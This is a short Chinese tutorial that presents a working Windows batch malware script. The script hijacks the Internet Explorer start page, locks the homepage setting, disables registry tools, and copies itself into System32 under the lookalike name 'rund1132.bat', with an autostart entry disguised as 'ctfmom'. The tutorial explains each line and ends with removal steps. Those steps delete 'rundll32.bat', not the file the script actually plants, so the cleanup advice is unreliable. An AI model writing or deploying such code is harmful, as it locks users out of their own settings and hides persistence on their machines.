一段简单的恶意程序代码

@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f
copy %0 %windir%\System32\rund1132.bat

• 恶意代码效果

• 将 IE 浏览器的主页修改为 http://www.xxxx.com

• 锁定 Internet 选项的“主页”对话框，禁用注册表编辑器

• 准备恶意代码

• 使用记事本新建一个空文件，输入以下程序代码后另存为“ rundll32.bat ”

注册表中还添加了一个名为ctfmom的系统开机启动任务，用户每次登录后会自动执行上述代码。这样即使已解除注册表锁定、修复IE主页，若不清理此启动项，则重新开机后危害依旧

解释代码：

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f   设置起始页 第一个参数为注册表路径 /v设置名称 /d 键值 /f强制覆盖

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f    锁定主页

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f 锁定注册表

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f     添加启动项

消除恶意程序

删除文件C:\Windows\System32\rundll32.bat

运行gpedit.msc组策略编辑器

 用户配置-->管理模板-->系统，将“阻止访问注册表工具”设为“已禁用”

用户配置-->管理模板-->Windows组件-->Internet Explorer，将“禁止更改主页设置”设为“已禁用”

编辑注册表，删除开机启动项“ctfmom”

重新打开Internet Explorer浏览器，修复主页设置

命令行中regedit进入编辑注册表可查看